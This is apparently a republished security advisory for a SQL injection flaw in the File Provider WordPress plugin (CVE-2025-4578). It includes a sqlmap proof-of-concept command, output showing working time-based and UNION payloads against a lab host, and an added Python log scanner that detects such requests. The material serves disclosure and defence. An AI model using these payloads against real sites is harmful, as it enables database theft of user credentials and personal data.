File Provider SQL Injection Vulnerability

Vulnerability Information

Vulnerability name: File Provider SQL injection vulnerability

Vulnerability ID:

  • CVE: CVE-2025-4578

Vulnerability type: SQL injection

Severity: High

Vulnerability description: File Provider is a WordPress plugin that provides file management and download functionality. It is widely used on WordPress sites that need file sharing and management, and because that need is so common, the plugin is deployed on sites across many industries and sizes. The vulnerability affects all versions of the plugin, including the latest, 1.2.3.

The vulnerability is a SQL injection in the handling of the 'fileId' parameter. Because the user-supplied parameter is insufficiently escaped and the existing SQL query is not properly prepared, an unauthenticated attacker can append additional SQL queries to the existing query by supplying a crafted 'fileId' value. This can be used to extract sensitive information from the database.

The security risk is high because the flaw lets an unauthenticated remote attacker execute SQL queries, potentially exposing sensitive information in the database such as user credentials and personal data. Because the attack requires no authentication and can be carried out with automated tools (such as sqlmap), its potential impact is broad, especially on sites that have not updated the plugin promptly.

Vendor: WordPress

Product: File Provider

Affected versions: <= 1.2.3

Source: https://github.com/RandomRobbieBF/CVE-2025-4578

Type: CVE-2025:github search

Repository files

  • README.md

Source overview

CVE-2025-4578

File Provider <= 1.2.3 - Unauthenticated SQL Injection

Description

The File Provider plugin for WordPress is vulnerable to SQL Injection via the ‘fileId’ parameter in all versions up to, and including, 1.2.3 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.

Details

  • Type: plugin
  • Slug: file-provider
  • Affected Version: 1.2.3
  • CVSS Score: 7.5
  • CVSS Rating: High
  • CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
  • CVE: CVE-2025-4578
  • Status: Closed

POC

sqlmap.py -u "http://kubernetes.docker.internal:8999/wp-admin/admin-ajax.php?action=dfp_download_file&fileId=*" --dbs --batch --dbms mysql --level=5 --risk=3 --threads=1 --time-sec=5
___
__H__
___ ___[,]_____ ___ ___ {1.9.7.3#dev}
|_ -| . [)] | .'| . |
|___|_ [.]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 12:27:43 /2025-07-10/

custom injection marker ('*') found in option '-u'. Do you want to process it? [Y/n/q] Y
[12:27:44] [WARNING] it seems that you've provided empty parameter value(s) for testing. Please, always use only valid parameter values so sqlmap could be able to run properly
[12:27:44] [INFO] testing connection to the target URL
[12:27:44] [WARNING] the web server responded with an HTTP error code (500) which could interfere with the results of the tests
you have not declared cookie(s), while server wants to set its own ('PHPSESSID=3c848e84eb9...0a1642563d'). Do you want to use those [Y/n] Y
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* (URI)
Type: time-based blind
Title: MySQL >= 5.0.12 time-based blind - Parameter replace (substraction)
Payload: http://kubernetes.docker.internal:8999/wp-admin/admin-ajax.php?action=dfp_download_file&fileId=(SELECT 6405 FROM (SELECT(SLEEP(5)))IWaW)

Type: UNION query
Title: Generic UNION query (random number) - 1 column
Payload: http://kubernetes.docker.internal:8999/wp-admin/admin-ajax.php?action=dfp_download_file&fileId=-9489 UNION ALL SELECT CONCAT(0x7170717671,0x7a444e596a635a4a5973674b546c5748505855427457424358546451667473444c444c614f455173,0x71626b7171)-- -
---
[12:27:44] [INFO] testing MySQL
[12:27:45] [INFO] confirming MySQL
[12:27:45] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian
web application technology: PHP 8.2.28, PHP, Apache 2.4.62
back-end DBMS: MySQL >= 9.0.0
[12:27:45] [INFO] fetching database names
[12:27:45] [INFO] retrieved: 'information_schema'
[12:27:45] [INFO] retrieved: 'performance_schema'
[12:27:45] [INFO] retrieved: 'exampledb'
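As an added defensive example (not part of the advisory or the RandomRobbieBF repository), the following Python scans web-server access logs for requests to the affected admin-ajax action whose fileId is anything other than a plain numeric id, the shape both sqlmap payloads above violate. The Apache combined log format, the sample lines and the assumption that a legitimate fileId is an integer are all constructed for this illustration.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample lines (Apache combined format). Line 1 is a normal download;
# lines 2 and 3 mirror the time-based and UNION payload shapes sqlmap reported above.
SAMPLE_LOG = r'''
10.0.0.5 - - [10/Jul/2025:12:27:40 +0000] "GET /wp-admin/admin-ajax.php?action=dfp_download_file&fileId=42 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.0.0.9 - - [10/Jul/2025:12:27:44 +0000] "GET /wp-admin/admin-ajax.php?action=dfp_download_file&fileId=%28SELECT%206405%20FROM%20%28SELECT%28SLEEP%285%29%29%29IWaW%29 HTTP/1.1" 500 0 "-" "sqlmap/1.9.7.3#dev"
10.0.0.9 - - [10/Jul/2025:12:27:44 +0000] "GET /wp-admin/admin-ajax.php?action=dfp_download_file&fileId=-9489%20UNION%20ALL%20SELECT%20CONCAT%280x7170717671%2C0x7a44%29--%20- HTTP/1.1" 200 230 "-" "sqlmap/1.9.7.3#dev"
10.0.0.7 - - [10/Jul/2025:12:28:01 +0000] "GET /wp-admin/admin-ajax.php?action=heartbeat HTTP/1.1" 200 12 "-" "Mozilla/5.0"
'''

# Apache combined log: client ip, timestamp, request line, status code.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# Tokens that never belong in an integer id; enough to name the technique in an alert.
SQLI_HINT = re.compile(r"\b(SLEEP|BENCHMARK|UNION|SELECT|CONCAT)\b|--\s|/\*|'", re.IGNORECASE)

def classify_file_id(value):
    """Return a reason string if a (already URL-decoded) fileId looks injected, else None."""
    if re.fullmatch(r"\d+", value):
        return None                      # plain numeric id: the expected shape (assumed)
    m = SQLI_HINT.search(value)
    if m:
        return "sql-keyword:" + m.group(0).upper()
    return "non-numeric"                 # also catches the empty value sqlmap warned about

def scan_log(text):
    """Yield one finding per suspicious fileId sent to the dfp_download_file action."""
    hits = []
    for line in text.strip().splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        qs = parse_qs(urlsplit(m["target"]).query, keep_blank_values=True)
        if "dfp_download_file" not in qs.get("action", []):
            continue
        for decoded in qs.get("fileId", []):   # parse_qs already percent-decodes
            reason = classify_file_id(decoded)
            if reason:
                hits.append({"ip": m["ip"], "time": m["ts"], "status": m["status"],
                             "reason": reason, "fileId": decoded[:80]})
    return hits

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit)
```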

http://example.com/2025/07/10/github_889039978/
Author: lianccc
Published: July 10, 2025